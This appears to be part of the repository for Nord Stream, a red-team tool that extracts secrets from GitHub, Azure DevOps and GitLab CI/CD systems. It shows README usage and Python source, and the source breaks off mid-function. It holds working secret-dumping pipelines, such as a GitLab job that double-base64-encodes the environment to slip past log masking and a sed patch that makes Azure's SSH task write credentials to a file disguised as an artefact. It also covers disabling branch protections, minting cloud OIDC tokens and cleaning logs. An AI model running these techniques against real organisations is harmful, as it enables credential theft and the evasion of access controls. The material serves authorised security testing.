Repository administrators can enforce required commit signing on a branch to block all commits that are not signed and verified. With Nord Stream it's possible to sign commits to bypass such protections.
First, create your GPG key and import it on the SCM platform.
```sh
$ gpg --full-generate-key
$ gpg --armor --export F94496913C43EFC5
$ gpg --list-secret-keys --keyid-format=long
sec dsa2048/F94496913C43EFC5 2023-07-18 [SC] [expires: 2023-07-23]
Key fingerprint = B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5
uid [ultimate] test-gpg <test.gpg@cicd.local>
```
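The public key then has to be registered on the SCM side so the signed commits show up as verified. As an illustration for GitHub, a sketch of one way to do this via the REST API (`POST /user/gpg_keys`, which requires a token with the `write:gpg_key` scope; the key ID matches the one generated above):

```bash
# Export the armored public key and register it for the token's user on GitHub.
PUBKEY=$(gpg --armor --export F94496913C43EFC5)
curl -s -X POST https://api.github.com/user/gpg_keys \
  -H "Authorization: Bearer $PAT" \
  -H "Accept: application/vnd.github+json" \
  -d "$(jq -n --arg key "$PUBKEY" '{armored_public_key: $key}')"
```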
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --key-id F94496913C43EFC5 --user test-gpg --email test.gpg@cicd.local --force
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_PROD_SECRET=my PROD_SECRET
```
```bash
$ git verify-commit 00dcd856624bc9a41f8bd70662f0650839730973
gpg: Signature made Tue 18 Jul 2023 10:34:18 PM CEST
gpg: using DSA key B1583F439899C5A3B74ED04BF94496913C43EFC5
gpg: Good signature from "test-gpg <test.gpg@cicd.local>" [ultimate]
Primary key fingerprint: B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5
```
### Azure DevOps
Nord Stream can extract the following types of secrets:
- Variable groups (vg)
- Secure files (sf)
- Service connections
#### Service connections
Azure DevOps offers the possibility to create connections with external and remote services for executing tasks in a job; these are called service connections. A service connection holds credentials for an identity to a remote service. There are multiple types of service connections in Azure DevOps.
Nord Stream currently supports secret extraction for the following types of service connections:
- AzureRM
- GitHub
- AWS
- SonarQube
- SSH
If you come across a non-supported type, please open an issue or make a pull request :)
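To see which service connections exist in a project before deploying anything, they can also be enumerated directly through the Azure DevOps REST API. A rough sketch (organization, project and API version are placeholders; authentication uses the PAT):

```bash
# List the service connections (service endpoints) of a project and their types.
curl -s -u ":$PAT" \
  "https://dev.azure.com/myorg/myproject/_apis/serviceendpoint/endpoints?api-version=7.1-preview.4" \
  | jq -r '.value[] | [.name, .type] | @tsv'
```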
##### SSH
The extraction for this service connection type was painful to implement. The output is the following:
```
hostname:::port:::user:::password:::privatekey
```
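Since the fields are joined with a `:::` separator, a quick way to make a decoded record readable (a sketch; assumes GNU sed and that the record was saved to a hypothetical `ssh.txt` file):

```bash
# Replace the ":::" separators with newlines; the last field (the private key)
# may itself span several lines and is left untouched.
sed 's/:::/\n/g' ssh.txt
```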
If you want to run it on a self-hosted runner you can do the following:
```
$ nord-stream devops ... --build-yaml test.yml --build-type ssh
[+] YAML file:
trigger: none
pool:
  vmImage: ubuntu-latest
steps:
  - checkout: none
  - script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak
      ; sed -i 's|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout
      = getReadyTimeoutVariable();\nconst fs = require("fs");var data = "";data += hostname
      + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz",
      data, (err) => {});|' $SSH_FILE
    displayName: Preparing Build artefacts
  - task: SSH@0
    inputs:
      sshEndpoint: '#FIXME'
      runOptions: commands
      commands: sleep 1
  - script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak
      $SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo ''
    displayName: Build artefacts
```
Then you need to:
1) Change `vmImage: ubuntu-latest` to `name: 'Self-Hosted pool name'`.
2) Add the name of the service connection in the `#FIXME` placeholder.
3) Deploy the pipeline with `--yaml test.yml`.
If you need to run this on a Windows self-hosted runner, replace `_serviceConnectionTemplateSSH` with `_serviceConnectionTemplateSSHWindows` in the `generatePipelineForSSH` method and perform the actions described previously.
Note: for both Windows and Linux self-hosted runners, you need to adapt the path (`/home/vsts/work/_tasks/` or `D:\a\`) to match the path where the runner is deployed. This information can be obtained in the `Capabilities` tab of an agent on Azure DevOps.
#### Listing orgs
With an access token it's possible to list the organizations bound to a user:
```
$ nord-stream devops --token "eyJ0eXA..." --list-orgs
[*] User orgs:
- myorg
- supersecretorg
```
This is based on [this research](https://zolder.io/en/blog/devops-access-is-closer-than-you-assume/).
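For reference, roughly the same enumeration can be done by hand against the Azure DevOps profile and accounts APIs. A sketch only, shown here with PAT authentication (the API versions may differ):

```bash
# Resolve the member id of the current identity, then list the organizations it belongs to.
MEMBER_ID=$(curl -s -u ":$PAT" \
  "https://app.vssps.visualstudio.com/_apis/profile/profiles/me?api-version=6.0" | jq -r '.id')
curl -s -u ":$PAT" \
  "https://app.vssps.visualstudio.com/_apis/accounts?memberId=$MEMBER_ID&api-version=6.0" \
  | jq -r '.value[].accountName'
```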
#### Help
```
$ nord-stream devops -h
CICD pipeline exploitation tool
Usage:
nord-stream devops [options] --token <pat> --org <org> [extraction] [--project <project> --write-filter --no-clean --branch-name <name> --pipeline-name <name> --repo-name <name>]
nord-stream devops [options] --token <pat> --org <org> --yaml <yaml> --project <project> [--write-filter --no-clean --branch-name <name> --pipeline-name <name> --repo-name <name>]
nord-stream devops [options] --token <pat> --org <org> --build-yaml <output> [--build-type <type>]
nord-stream devops [options] --token <pat> --org <org> --clean-logs [--project <project>]
nord-stream devops [options] --token <pat> --org <org> --list-projects [--write-filter]
nord-stream devops [options] --token <pat> --org <org> (--list-secrets [--project <project> --write-filter] | --list-users)
nord-stream devops [options] --token <pat> --org <org> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--ignore-cert Allow insecure server connections
Commit:
--user <user> User used to commit
--email <email> Email address used commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> Azure DevOps personal token or JWT
--org <org> Org name
-p, --project <project> Run on selected project (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all pipeline created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--list-projects List all projects.
--list-secrets List all secrets.
--list-users List all users.
--write-filter Filter projects where current user has write or admin access.
--build-yaml <output> Create a pipeline yaml file with default configuration.
--build-type <type> Type used to generate the yaml file can be: default, azurerm, github, aws, sonar, ssh
--describe-token Display information on the token
--branch-name <name> Use specific branch name for deployment.
--pipeline-name <name> Use pipeline for deployment.
--repo-name <name> Use specific repo for deployment.
Extraction:
--extract <list> Extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
--no-extract <list> Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
Examples:
List all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg --list-secrets
Dump all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg
Authors: @hugow @0hexit
```
### GitHub
#### List protections
The `--list-protections` option can be used to list the protections applied to a branch and to environments:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --list-protections
[*] Using branch: "main"
[*] Checking security: "synacktiv/repo"
[*] Found branch protection rule on "main" branch
[*] Branch protections:
- enforce admins: True
- block creations: True
- required signatures: True
- allow force pushes: False
- allow deletions: False
- required pull request reviews: False
- required linear history: False
- required conversation resolution: False
- lock branch: False
- allow fork syncing: False
[*] Environment protection for: "DEV":
- deployment branch policy: custom
[*] No environment protection rule found for: "INT"
[*] Environment protection for: "PROD":
- deployment branch policy: custom
```
Depending on your permissions, you may see less information; only administrators get the full details of the protections.
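The same details are exposed by the GitHub REST API if you want to check a single branch by hand; a sketch (endpoint `GET /repos/{owner}/{repo}/branches/{branch}/protection`, admin access required to see everything):

```bash
# Dump the protection rules of the "main" branch of a single repository.
curl -s -H "Authorization: Bearer $PAT" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/Synacktiv/repo/branches/main/protection" | jq .
```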
#### Disable protections
The `--disable-protections` option can be used to temporarily disable the protections applied to a branch or an environment, perform the dump, and then restore all the protections:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --no-repo --no-org --env prod --disable-protections
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Found branch protection rule on "main" branch
[...]
[!] Removing branch protection, wait until it's restored.
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Environment protection for: "PROD":
- deployment branch policy: custom
[!] Modifying env protection, wait until it's restored.
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[!] Restoring env protections.
[+] Secrets:
secret_PROD_SECRET=my PROD_SECRET
[*] Cleaning logs.
[!] Restoring branch protection.
```
This requires admin privileges.
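For a single repository, the underlying operation can also be reproduced manually. The sketch below only shows the removal side and is not what Nord Stream does verbatim, since the tool saves the existing configuration and restores it afterwards:

```bash
# Remove the branch protection rule on "main" (admin rights required).
# Restoring it afterwards means re-creating the rule with its saved configuration
# via a PUT request on the same endpoint.
curl -s -X DELETE \
  -H "Authorization: Bearer $PAT" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/Synacktiv/repo/branches/main/protection"
```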
#### Force
By default, if Nord Stream detects a protection on a branch or on an environment, it won't perform the secret extraction. If you think that the protections are too permissive or can be bypassed with your privileges, the `--force` option can be used to deploy the pipeline regardless of the protections.
#### Azure OIDC
OIDC (OpenID Connect) can be used to connect to cloud services. The general idea is to allow authorized pipelines or workflows to get short-lived access tokens directly from a cloud provider, without involving any static secrets. Authorization is based on trust relationships configured on the cloud provider's side and conditioned on the origin of the pipeline or workflow.
Here is an example of a GitHub workflow using OIDC:
```yaml
[...]
  steps:
    - name: OIDC Login to Azure Public Cloud
      uses: azure/login@v1
      with:
        client-id: ${{ secrets.AZURE_CLIENT_ID }}
        tenant-id: ${{ secrets.AZURE_TENANT_ID }}
        subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} # this can be optional
```
If you come across such a workflow, this means that the repository might be configured to get a short-lived access token that can give you access to Azure resources.
Nord Stream is able to deploy a pipeline to retrieve such an access token with the following options:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --azure-client-id 65cd6002-25b9-11ee-88ac-7f80b19430c2 --azure-tenant-id 65cd6002-25b9-11ee-88ac-7f80b19430c2
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] No branch protection rule found on "main" branch
[*] Running OIDC Azure access tokens generation workflow
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] OIDC access tokens:
Access token to use with Azure Resource Manager API:
{
"accessToken":
"eyJ0eXAiOiJK[...]PVig",
"expiresOn": "2023-07-18 23:18:57.000000",
"subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tokenType": "Bearer"
}
Access token to use with MS Graph API:
{
"accessToken":
"eyJ0eXAi[...]_qTA",
"expiresOn": "2023-07-19 22:18:59.000000",
"subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
"tokenType": "Bearer"
}
```
The `--azure-subscription-id` option is optional and can be used to get an access token for a specific subscription.
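Once retrieved, the access tokens can be used like any other bearer tokens. For instance, a quick sketch to confirm that the ARM token works and to list the subscriptions it can see (the token value is a placeholder):

```bash
# Query the Azure Resource Manager API with the extracted access token.
curl -s -H "Authorization: Bearer $ARM_TOKEN" \
  "https://management.azure.com/subscriptions?api-version=2020-01-01" | jq .
```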
#### AWS OIDC
The same technique (see [Azure OIDC](#azure-oidc)) can be used to get a session token on AWS.
Here is an example of a workflow using AWS OIDC:
```yaml
[...]
  steps:
    - name: Configure AWS Credentials
      uses: aws-actions/configure-aws-credentials@v1
      with:
        role-to-assume: arn:aws:iam::133333333337:role/S3Access/CustomRole
        role-session-name: oidcrolesession
        aws-region: us-east-1
```
If you come across such a workflow, this means that the repository might be configured to get an AWS access token that can give you access to AWS resources.
Nord Stream is able to deploy a pipeline to retrieve such credentials with the following options:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --aws-role 'arn:aws:iam::133333333337:role/S3Access/CustomRole' --aws-region us-east-1 --force
[+] "Synacktiv/repo"
[*] Running OIDC AWS credentials generation workflow
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] OIDC credentials:
AWS_DEFAULT_REGION=us-east-1
AWS_SESSION_TOKEN=IQoJb3[...]KMs0/QB6
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=ASIA5ABC8XDMAP2ANNWO
AWS_SECRET_ACCESS_KEY=7KJLCjdJKqlpLKDAI9F7SH6SjSQBX68Sjm13xXDA
```
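The returned values are standard temporary credentials; a quick sketch to confirm they work and to see which role they map to (values taken from the example output above):

```bash
# Export the extracted credentials and check the resulting identity.
export AWS_ACCESS_KEY_ID=ASIA5ABC8XDMAP2ANNWO
export AWS_SECRET_ACCESS_KEY=7KJLCjdJKqlpLKDAI9F7SH6SjSQBX68Sjm13xXDA
export AWS_SESSION_TOKEN='IQoJb3[...]KMs0/QB6'
export AWS_DEFAULT_REGION=us-east-1
aws sts get-caller-identity
```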
#### Help
```
$ nord-stream github -h
CICD pipeline exploitation tool
Usage:
nord-stream github [options] --token <ghp> --org <org> [--repo <repo> --no-repo --no-env --no-org --env <env> --disable-protections --branch-name <name> --no-clean (--key-id <id> --user <user> --email <email>)]
nord-stream github [options] --token <ghp> --org <org> --yaml <yaml> --repo <repo> [--env <env> --disable-protections --branch-name <name> --no-clean (--key-id <id> --user <user> --email <email>)]
nord-stream github [options] --token <ghp> --org <org> ([--clean-logs] [--clean-branch-policy]) [--repo <repo> --branch-name <name>]
nord-stream github [options] --token <ghp> --org <org> --build-yaml <filename> --repo <repo> [--env <env>]
nord-stream github [options] --token <ghp> --org <org> --azure-tenant-id <tenant> --azure-client-id <client> [--azure-subscription-id <subscription> --repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --aws-role <role> --aws-region <region> [--repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --list-protections [--repo <repo> --branch-name <name> --disable-protections (--key-id <id> --user <user> --email <email>)]
nord-stream github [options] --token <ghp> --org <org> --list-secrets [--repo <repo> --no-repo --no-env --no-org]
nord-stream github [options] --token <ghp> [--org <org>] --list-repos [--write-filter]
nord-stream github [options] --token <ghp> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
Signing:
--key-id <id> GPG primary key ID
--user <user> User used to sign commits
--email <email> Email address used to sign commits
args:
--token <ghp> Github personal token
--org <org> Org name
-r, --repo <repo> Run on selected repo (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean workflow logs (default false)
--clean-branch-policy Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered.
--build-yaml <filename> Create a pipeline yaml file with all secrets.
--env <env> Specify env for the yaml file creation.
--no-repo Don't extract repo secrets.
--no-env Don't extract environment secrets.
--no-org Don't extract organization secrets.
--azure-tenant-id <tenant> Identifier of the Azure tenant associated with the application having federated credentials (OIDC related).
--azure-subscription-id <subscription> Identifier of the Azure subscription associated with the application having federated credentials (OIDC related).
--azure-client-id <client> Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related).
--aws-role <role> AWS role to assume (OIDC related).
--aws-region <region> AWS region (OIDC related).
--list-protections List all protections.
--list-repos List all repos.
--list-secrets List all secrets.
--disable-protections Disable the branch protection rules (needs admin rights)
--write-filter Filter repo where current user has write or admin access.
--force Don't check environment and branch protections.
--branch-name <name> Use specific branch name for deployment.
--describe-token Display information on the token
Examples:
List all secrets from all repositories
$ nord-stream github --token "$GHP" --org myorg --list-secrets
Dump all secrets from all repositories and try to disable branch protections
$ nord-stream github --token "$GHP" --org myorg --disable-protections
Authors: @hugow @0hexit
```
### GitLab
As described in the article, there is no way to remove the logs in the activity tab after a pipeline deployment. This must be taken into account during Red Team engagements.
#### List secrets
The `--list-secrets` option can be used to list and extract secrets from GitLab.
The way GitLab manages secrets is a bit different from Azure DevOps and GitHub Actions. With admin access to a project or group, or admin access to the GitLab instance, it is possible to extract all the defined CI/CD variables without deploying any pipeline.
A low-privileged user, however, cannot list the secrets defined at the project, group or instance level. Still, users with write access to a project can deploy a malicious pipeline to exfiltrate the environment variables exposing the CI/CD variables. This means that a low-privileged user has no way of knowing whether a secret is defined for a specific project; the only option is to look at the legitimate pipelines already present in the project and check whether they use sensitive environment variables.
Here is a pipeline file to perform this operation on GitLab:
```yaml
stages:
- synacktiv
deploy-production:
image: ubuntu:latest
stage: synacktiv
script:
- env | base64 -w0 | base64 -w 0
```
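The job output can then be decoded locally; the double base64 encoding is presumably there to avoid GitLab's masking of secret values in the job logs:
```sh
$ echo "<job output>" | base64 -d | base64 -d
```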
GitLab also supports secure files, like Azure DevOps. Secure files are defined at the project level. Like the variables, it is not possible to list the secure files without admin access to the project. However, with admin access, Nord Stream will try to exfiltrate the secure files related to the projects.
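For reference, here is a rough sketch of what this extraction relies on, namely the GitLab secure files REST API. The instance URL, project ID (42) and secure file ID (7) below are placeholders:
```sh
# List the secure files of a project (requires sufficient privileges on the project)
$ curl -s -H "PRIVATE-TOKEN: $TOKEN" "https://gitlab.corp.local/api/v4/projects/42/secure_files"
# Download a given secure file by its ID
$ curl -s -H "PRIVATE-TOKEN: $TOKEN" -o secure_file.bin \
    "https://gitlab.corp.local/api/v4/projects/42/secure_files/7/download"
```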
#### YAML
Same as [YAML](#yaml), except that you need to provide the full project path, like this:
```sh
$ nord-stream gitlab --token "$PAT" --url https://gitlab.corp.local --project 'group/projectname' --yaml ci.yml
```
The output of the `--list-projects` command returns such paths.
#### List protections
Same as [GitHub list protections](#list-protections)
#### Help
```
$ nord-stream gitlab -h
CICD pipeline exploitation tool
Usage:
nord-stream gitlab [options] --token <pat> (--list-secrets | --list-protections) [--project <project> --group <group> --no-project --no-group --no-instance --write-filter]
nord-stream gitlab [options] --token <pat> ( --list-groups | --list-projects ) [--project <project> --group <group> --write-filter]
nord-stream gitlab [options] --token <pat> --yaml <yaml> --project <project> [--no-clean]
nord-stream gitlab [options] --token <pat> --clean-logs [--project <project>]
nord-stream gitlab [options] --token <pat> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--url <gitlab_url> Gitlab URL [default: https://gitlab.com]
--ignore-cert Allow insecure server connections
Commit:
--user <user> User used to commit
--email <email> Email address used to commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> GitLab personal access token or _gitlab_session cookie
--project <project> Run on selected project (can be a file)
--group <group> Run on selected group (can be a file)
--list-secrets List all secrets.
--list-protections List branch protection rules.
--list-projects List all projects.
--list-groups List all groups.
--write-filter Filter repo where current user has developer access or more.
--no-project Don't extract project secrets.
--no-group Don't extract group secrets.
--no-instance Don't extract instance secrets.
-y, --yaml <yaml> Run arbitrary job
--branch-name <name> Use specific branch name for deployment.
--clean-logs Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--describe-token Display information on the token
Examples:
Dump all secrets
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets
Deploy the custom pipeline on the master branch
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch-name master --project 'group/projectname'
Authors: @hugow @0hexit
```
## TODO
- [ ] Add support of URLs corresponding to Azure DevOps Server instances (on-premises solutions)
- [ ] Add an option to extract secrets via Windows hosts
- [ ] Add support of other CI/CD environments (Jenkins/Bitbucket)
- [ ] Use the GitHub GraphQL API instead of the REST one to list the branch protection rules and temporarily disable them if they match the malicious branch about to be pushed
## Contact
Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to us on Twitter [@hugow](https://twitter.com/hugow_vincent) and [@0hexit](https://twitter.com/0hexit).
================================================
FILE: nordstream/__main__.py
================================================
#!/usr/bin/env python3
"""
CICD pipeline exploitation tool
Usage:
nord-stream <command> [<args>...]
Commands
github command related to GitHub.
devops command related to Azure DevOps.
gitlab command related to GitLab.
Options:
-h --help Show this screen.
--version Show version.
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.utils.log import logger
def main():
args = docopt(__doc__, version="0.1", options_first=True)
argv = [args["<command>"]] + args["<args>"]
if args["<command>"] == "github":
import nordstream.commands.github as github
github.start(argv)
elif args["<command>"] == "devops":
import nordstream.commands.devops as devops
devops.start(argv)
elif args["<command>"] == "gitlab":
import nordstream.commands.gitlab as gitlab
gitlab.start(argv)
else:
logger.error(f"{args['<command>']} is not a nord-stream command.")
if __name__ == "__main__":
main()
================================================
FILE: nordstream/cicd/devops.py
================================================
import requests
import time
from os import makedirs
from nordstream.utils.log import logger
from nordstream.yaml.devops import DevOpsPipelineGenerator
from nordstream.git import Git
from nordstream.utils.errors import DevOpsError
from nordstream.utils.constants import *
from nordstream.utils.helpers import isAZDOBearerToken
# painful warnings, you know what you are doing right?
requests.packages.urllib3.disable_warnings()
class DevOps:
_DEFAULT_PIPELINE_NAME = DEFAULT_PIPELINE_NAME
_DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME
_token = None
_auth = None
_org = None
_devopsLoginId = None
_projects = []
_baseURL = "https://dev.azure.com/"
_header = {
"Accept": "application/json; api-version=6.0-preview",
"User-Agent": USER_AGENT,
}
_session = None
_repoName = DEFAULT_REPO_NAME
_outputDir = OUTPUT_DIR
_pipelineName = _DEFAULT_PIPELINE_NAME
_branchName = _DEFAULT_BRANCH_NAME
_defaultAgentPool = None
_sleepTime = 15
_maxRetry = 10
def __init__(self, token, org, verifCert):
self._token = token
self._org = org
self._baseURL += f"{org}/"
self._session = requests.Session()
self.setCookiesAndHeaders()
self._session.verify = verifCert
self._devopsLoginId = self.__getLogin()
@property
def projects(self):
return self._projects
@property
def org(self):
return self._org
@property
def branchName(self):
return self._branchName
@branchName.setter
def branchName(self, value):
self._branchName = value
@property
def repoName(self):
return self._repoName
@repoName.setter
def repoName(self, value):
self._repoName = value
@property
def pipelineName(self):
return self._pipelineName
@pipelineName.setter
def pipelineName(self, value):
self._pipelineName = value
@property
def defaultAgentPool(self):
return self._defaultAgentPool
@defaultAgentPool.setter
def defaultAgentPool(self, value):
self._defaultAgentPool = value
@property
def sleepTime(self):
return self._sleepTime
@sleepTime.setter
def sleepTime(self, value):
self._sleepTime = int(value)
@property
def token(self):
return self._token
@property
def outputDir(self):
return self._outputDir
@outputDir.setter
def outputDir(self, value):
self._outputDir = value
@property
def defaultPipelineName(self):
return self._DEFAULT_PIPELINE_NAME
@property
def defaultBranchName(self):
return self._DEFAULT_BRANCH_NAME
def __getLogin(self):
return self.getUser().get("authenticatedUser").get("id")
def getUser(self):
logger.debug("Retrieving user information")
return self._session.get(
f"{self._baseURL}/_apis/ConnectionData",
).json()
def setCookiesAndHeaders(self):
if isAZDOBearerToken(self._token):
self._session.headers.update({"Authorization": f"Bearer {self._token}"})
else:
self._session.auth = ("", self._token)
self._session.headers.update(self._header)
def listProjects(self):
logger.debug("Listing projects")
continuationToken = 0
# Azure DevOps pagination
while True:
params = {"continuationToken": continuationToken}
response = self._session.get(
f"{self._baseURL}/_apis/projects",
params=params,
).json()
if len(response.get("value")) != 0:
for repo in response.get("value"):
p = {"id": repo.get("id"), "name": repo.get("name")}
self._projects.append(p)
continuationToken += response.get("count")
else:
break
def listUsers(self):
logger.debug("Listing users")
continuationToken = None
res = []
params = {}
# Azure DevOps pagination
while True:
if continuationToken:
params = {"continuationToken": continuationToken}
response = self._session.get(
f"https://vssps.dev.azure.com/{self._org}/_apis/graph/users",
params=params,
)
headers = response.headers
response = response.json()
if len(response.get("value")) != 0:
for user in response.get("value"):
p = {
"origin": user.get("origin"),
"displayName": user.get("displayName"),
"mailAddress": user.get("mailAddress"),
}
res.append(p)
continuationToken = headers.get("x-ms-continuationtoken", None)
if not continuationToken:
break
else:
break
return res
# TODO: crappy code I know
def filterWriteProjects(self):
continuationToken = None
res = []
params = {}
# Azure DevOps pagination
while True:
if continuationToken:
params = {"continuationToken": continuationToken}
response = self._session.get(
f"https://vssps.dev.azure.com/{self._org}/_apis/graph/groups",
params=params,
)
headers = response.headers
response = response.json()
if len(response.get("value")) != 0:
for project in self._projects:
for group in response.get("value"):
name = project.get("name")
if self.__checkProjectPrivs(self._devopsLoginId, name, group):
duplicate = False
for p in res:
if p.get("id") == project.get("id"):
duplicate = True
if not duplicate:
res.append(project)
continuationToken = headers.get("x-ms-continuationtoken", None)
if not continuationToken:
break
else:
break
self._projects = res
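# Check whether the given login belongs to one of the project groups that grant write access
# ([project] Team, Contributors or Project Administrators), paging through the GroupEntitlements members.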
def __checkProjectPrivs(self, login, projectName, group):
groupPrincipalName = group.get("principalName")
writeGroups = [
f"[{projectName}]\\{projectName} Team",
f"[{projectName}]\\Contributors",
f"[{projectName}]\\Project Administrators",
]
pagingToken = None
params = {}
for g in writeGroups:
if groupPrincipalName == g:
originId = group.get("originId")
while True:
if pagingToken:
params = {"pagingToken": pagingToken}
response = self._session.get(
f"https://vsaex.dev.azure.com/{self._org}/_apis/GroupEntitlements/{originId}/members",
params=params,
).json()
pagingToken = response.get("continuationToken")
if len(response.get("items")) != 0:
for user in response.get("items"):
if user.get("id") == login:
return True
else:
return False
def listRepositories(self, project):
logger.debug("Listing repositories")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/git/repositories",
).json()
return response.get("value")
def listPipelines(self, project):
logger.debug("Listing pipelines")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/pipelines",
).json()
return response.get("value")
def addProject(self, project):
logger.debug(f"Checking project: {project}")
response = self._session.get(
f"{self._baseURL}/_apis/projects/{project}",
).json()
if response.get("id"):
p = {"id": response.get("id"), "name": response.get("name")}
self._projects.append(p)
@classmethod
def checkToken(cls, token, org, verifCert):
logger.verbose(f"Checking token: {token}")
try:
return (
requests.get(
f"https://dev.azure.com/{org}/_apis/ConnectionData",
auth=("foo", token),
headers=DevOps._header,
verify=verifCert,
).status_code
== 200
)
except Exception as e:
logger.error(e)
return False
def listProjectVariableGroupsSecrets(self, project):
logger.debug(f"Listing variable groups for: {project}")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/distributedtask/variablegroups",
)
if response.status_code != 200:
raise DevOpsError("Can't list variable groups secrets.")
response = response.json()
res = []
if response.get("count", 0) != 0:
for variableGroup in response.get("value"):
name = variableGroup.get("name")
id = variableGroup.get("id")
variables = []
for var in variableGroup.get("variables").keys():
variables.append(var)
res.append({"name": name, "id": id, "variables": variables})
return res
def listProjectSecureFiles(self, project):
logger.debug(f"Listing secure files for: {project}")
response = self._session.get(
f"{self._baseURL}/{project}/_apis/distributedtask/securefiles",
)
if response.status_code != 200:
raise DevOpsError("Can't list secure files.")
response = response.json()
res = []
if response["count"]:
for secureFile in response["value"]:
res.append({"name": secureFile["name"], "id": secureFile["id"]})
return res
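# Make sure the deployed pipeline can use a protected resource (variable group, secure file or service connection):
# if neither all pipelines nor this pipeline are already authorized, patch the pipelinePermissions endpoint to grant access.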
def authorizePipelineForResourceAccess(self, projectId, pipelineId, resource, resourceType):
resourceId = resource["id"]
logger.debug(f"Checking current pipeline permissions for: \"{resource['name']}\"")
response = self._session.get(
f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}",
).json()
allPipelines = response.get("allPipelines")
if allPipelines and allPipelines.get("authorized"):
return True
for pipeline in response.get("pipelines"):
if pipeline.get("id") == pipelineId:
return True
logger.debug(f"\"{resource['name']}\" has restricted permissions. Adding access permissions for the pipeline")
response = self._session.patch(
f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}",
json={"pipelines": [{"id": pipelineId, "authorized": True}]},
)
if response.status_code != 200:
logger.error(f"Error: unable to give the custom pipeline access to {resourceType}: \"{resource['name']}\"")
return False
return True
def createGit(self, project):
logger.debug(f"Creating git repo for: {project}")
data = {"name": self._repoName, "project": {"id": project}}
response = self._session.post(
f"{self._baseURL}/{project}/_apis/git/repositories",
json=data,
).json()
return response
def deleteGit(self, project, repoId):
logger.debug(f"Deleting git repo for: {project}")
response = self._session.delete(
f"{self._baseURL}/{project}/_apis/git/repositories/{repoId}",
)
return response.status_code == 204
def createPipeline(self, project, repoId, path):
logger.debug("Creating pipeline")
data = {
"folder": None,
"name": self._pipelineName,
"configuration": {
"type": "yaml",
"path": path,
"repository": {
"id": repoId,
"type": "azureReposGit",
"defaultBranch": self._branchName,
},
},
}
response = self._session.post(
f"{self._baseURL}/{project}/_apis/pipelines",
json=data,
).json()
pipeline_id = response.get("id")
if self._defaultAgentPool:
logger.debug("Setting default agent pool")
# Retrieve project queues, not organization pools, for Default agent pool
queues_url = f"{self._baseURL}/{project}/_apis/distributedtask/queues"
response = self._session.get(queues_url)
queues = response.json()
queue_id = None
queue_name = None
for queue in queues['value']:
if queue['pool']['name'] == self._defaultAgentPool:
queue_id = queue['id']
queue_name = queue['name']
